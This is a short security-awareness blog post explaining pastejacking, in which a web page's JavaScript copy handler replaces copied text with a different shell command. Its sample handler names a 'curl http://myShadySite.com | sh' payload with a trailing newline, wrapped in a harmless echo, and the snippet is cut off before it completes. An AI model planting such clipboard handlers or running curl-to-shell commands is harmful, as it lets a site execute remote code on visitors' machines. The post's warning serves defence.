When you see a shell command on the Internet, do not copy it into your terminal.

Modern JavaScript Clipboard APIs allow a website to overwrite what is added to the clipboard.

Here is an example of how simple this attack can be.

$ echo "looks safe to me!"

Note that you don't even have to press ENTER in your terminal after pasting for the exploit to happen. The payload conveniently contains a trailing newline that does that for you!

Here is the JavaScript that is performing the exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'


Cover Image Credit: https://www.pexels.com/@soumil-kumar-4325